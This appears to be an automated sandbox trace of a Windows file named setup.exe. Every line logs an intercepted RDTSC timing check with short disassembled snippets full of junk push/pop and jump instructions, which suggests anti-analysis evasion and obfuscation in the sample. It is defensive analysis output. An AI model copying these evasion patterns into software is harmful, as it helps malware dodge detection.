Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633D0 second address: E633D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633D4 second address: E633D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633D8 second address: E633E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FF32CFB71F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633E7 second address: E633FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF32CDD656Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633FC second address: E6343A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF32CFB7209h 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jng 00007FF32CFB71FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6343A second address: E63451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FF32CDD6570h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63451 second address: E63484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FF32CFB7200h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF32CFB7203h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63484 second address: E6349C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6574h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E648C4 second address: E648E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7205h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DF22DD second address: DF22E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6CEEE second address: E6CEF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6DA5C second address: E6DA62 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6DA62 second address: E6DAA9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF32CFB71F8h 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FF32CFB71FAh 0x00000015 jmp 00007FF32CFB7201h 0x0000001a jmp 00007FF32CFB7206h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6DAA9 second address: E6DAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E72849 second address: E7284F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E7284F second address: E7286F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CDD6566h 0x00000008 jmp 00007FF32CDD656Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DFA8C5 second address: DFA8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DFA8D0 second address: DFA8D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DFA8D4 second address: DFA8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DFA8DA second address: DFA8DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3CE6A second address: E3CE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3CE6E second address: E1FA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FF32CDD6568h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+122D3504h] 0x0000002a lea eax, dword ptr [ebp+12481B8Bh] 0x00000030 xor edx, dword ptr [ebp+122D35A0h] 0x00000036 mov di, 14FDh 0x0000003a nop 0x0000003b jmp 00007FF32CDD6572h 0x00000040 push eax 0x00000041 ja 00007FF32CDD656Ah 0x00000047 push esi 0x00000048 pushad 0x00000049 popad 0x0000004a pop esi 0x0000004b nop 0x0000004c clc 0x0000004d call dword ptr [ebp+122D2BBFh] 0x00000053 push edi 0x00000054 jmp 00007FF32CDD6570h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3CF65 second address: E3CF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D303 second address: E3D309 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D309 second address: E3D30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D3A5 second address: E3D3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF32CDD6566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D558 second address: E3D574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D6C8 second address: E3D6CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D6CD second address: E3D6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FF32CFB71FEh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edx 0x00000013 jg 00007FF32CFB71FCh 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D8EF second address: E3D8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D8F3 second address: E3D8F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D8F7 second address: E3D8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D8FD second address: E3D903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D903 second address: E3D915 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FF32CDD6566h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D915 second address: E3D95E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FF32CFB71F8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000004h 0x00000028 mov cl, 70h 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FF32CFB7202h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3DD0F second address: E3DD19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF32CDD6566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3DD19 second address: E3DD4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 0000001Eh 0x00000010 sub dword ptr [ebp+122D32D8h], ecx 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF32CFB7201h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E72042 second address: E72051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E7729E second address: E772BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7209h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E772BD second address: E772DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FF32CDD6574h 0x0000000b jo 00007FF32CDD6566h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E772DE second address: E772E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77EEC second address: E77EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77EF0 second address: E77EF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77EF4 second address: E77EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77EFA second address: E77F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77F00 second address: E77F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780A1 second address: E780AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780AF second address: E780B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780B5 second address: E780B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780B9 second address: E780D3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF32CDD656Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780D3 second address: E780EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FF32CFB71FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnc 00007FF32CFB71F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E7853D second address: E78550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E78550 second address: E7858B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CFB71F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF32CFB7200h 0x00000012 jne 00007FF32CFB7208h 0x00000018 jmp 00007FF32CFB7202h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E7B8CA second address: E7B8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E829ED second address: E82A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82A04 second address: E82A10 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF32CDD656Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82A10 second address: E82A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82A18 second address: E82A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82A1E second address: E82A28 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF32CFB71F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8145C second address: E81477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6575h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81739 second address: E8173D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81CE2 second address: E81CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81CE8 second address: E81CF8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF32CFB71F6h 0x00000008 js 00007FF32CFB71F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81FC0 second address: E81FCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81FCF second address: E81FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FF32CFB71FEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82416 second address: E8241A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8241A second address: E8243A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7207h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8243A second address: E82440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8118A second address: E811A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7202h 0x00000007 jnp 00007FF32CFB71F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E811A6 second address: E811C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6576h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8A458 second address: E8A45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89D1D second address: E89D52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF32CDD6576h 0x00000008 jmp 00007FF32CDD656Dh 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF32CDD656Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89D52 second address: E89D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89E84 second address: E89EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF32CDD6574h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF32CDD6574h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jbe 00007FF32CDD6566h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89EBE second address: E89EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89EC4 second address: E89EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF32CDD6576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8A03A second address: E8A040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8A040 second address: E8A051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FF32CDD6566h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8A051 second address: E8A055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8CB32 second address: E8CB51 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF32CDD6566h 0x00000008 jg 00007FF32CDD6566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FF32CDD656Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8CB51 second address: E8CB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8CB58 second address: E8CB74 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD656Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FF32CDD6568h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93115 second address: E9311F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CFB71FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9311F second address: E93128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93558 second address: E93581 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF32CFB71F6h 0x00000008 jmp 00007FF32CFB7206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jp 00007FF32CFB71F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E936B4 second address: E936BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3DBB0 second address: E3DC30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jno 00007FF32CFB720Dh 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FF32CFB71F8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b movsx ecx, cx 0x0000002e push 00000004h 0x00000030 mov edi, dword ptr [ebp+122D3394h] 0x00000036 nop 0x00000037 push edi 0x00000038 jmp 00007FF32CFB7201h 0x0000003d pop edi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF32CFB7203h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3DC30 second address: E3DC36 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93959 second address: E93963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF32CFB71F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93963 second address: E93983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF32CDD6570h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FF32CDD6566h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93983 second address: E93997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jnp 00007FF32CFB71F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E97E38 second address: E97E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
